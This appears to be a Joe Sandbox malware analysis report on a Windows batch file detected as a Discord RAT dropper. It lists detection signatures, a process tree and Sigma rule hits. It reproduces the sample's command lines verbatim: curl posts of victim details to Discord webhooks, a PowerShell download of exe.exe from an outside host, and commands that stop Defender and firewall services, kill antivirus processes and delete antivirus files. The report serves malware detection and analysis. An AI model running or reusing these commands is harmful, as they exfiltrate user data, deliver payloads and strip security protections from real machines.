Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
main.bat.bin.bat

Overview

General Information

Sample name:main.bat.bin.bat
Analysis ID:1526626
MD5:e9586e0e3590d13cc5a4c413b18efd12
SHA1:697e5683ea6cc8a640d88959e893bf19e264aba4
SHA256:d0dd54a04d8c0ec90877013ed6314793ce52537f72143c35bdc2646c26dd3fae
Tags:batuser-vm001cn
Infos:

Detection

Discord Rat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Discord Rat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to disable the Task Manager (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Suspicious Windows Service Tampering
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: Windows Firewall Disabled via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2344 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 3700 cmdline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • WMIC.exe (PID: 2852 cmdline: wmic computersystem get manufacturer,model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3032 cmdline: findstr /i "vmware virtualbox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • curl.exe (PID: 3524 cmdline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • net.exe (PID: 2100 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • net1.exe (PID: 6872 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • powershell.exe (PID: 6712 cmdline: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 6704 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 3684 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • explorer.exe (PID: 6704 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 4424 cmdline: powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3272 cmdline: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6872 cmdline: powershell -Command "Stop-Process -Name MSASCui -Force -ErrorAction SilentlyContinue" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6364 cmdline: powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1372 cmdline: powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6168 cmdline: powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1440 cmdline: powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4080 cmdline: powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • curl.exe (PID: 6364 cmdline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to change directory to 'C:\\Users\\Public\\Documents\\Secret Document'\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • curl.exe (PID: 4268 cmdline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • powershell.exe (PID: 6104 cmdline: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3372 cmdline: powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 5868 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
main.bat.bin.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\Documents\Secret Document\exe.exeJoeSecurity_DiscordRatYara detected Discord RatJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_6104.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Potential WinAPI Calls Via CommandLine
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , CommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , ProcessId: 6712, ProcessName: powershell.exe
        Sigma detected: Suspicious Windows Service Tampering
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", CommandLine: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", ProcessId: 3272, ProcessName: powershell.exe
        Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 2344, TargetFilename: C:\Users\Public\Documents\Secret Document
        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", ProcessId: 6704, ProcessName: csc.exe
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6104, TargetFilename: C:\Users\Public\Documents\Secret Document\exe.exe
        Sigma detected: PowerShell Download Pattern
        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", CommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", ProcessId: 6104, ProcessName: powershell.exe
        Sigma detected: PowerShell Web Download
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", CommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", ProcessId: 6104, ProcessName: powershell.exe
        Sigma detected: Remote Thread Creation By Uncommon Source Image
        Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 6704, StartAddress: C70F51D0, TargetImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, TargetProcessId: 6704
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz", CommandLine: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz", ProcessId: 3700, ProcessName: curl.exe
        Sigma detected: Use Short Name Path in Command Line
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }", CommandLine: powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }", ProcessId: 1440, ProcessName: powershell.exe
        Sigma detected: Windows Firewall Disabled via PowerShell
        Source: Process startedAuthor: Tim Rauch: Data: Command: powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False", CommandLine: powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False", ProcessId: 6364, ProcessName: powershell.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6712, TargetFilename: C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , CommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , ProcessId: 6712, ProcessName: powershell.exe
        Sigma detected: Stop Windows Service Via PowerShell Stop-Service
        Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", CommandLine: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", ProcessId: 3272, ProcessName: powershell.exe
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5868, ProcessName: svchost.exe

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
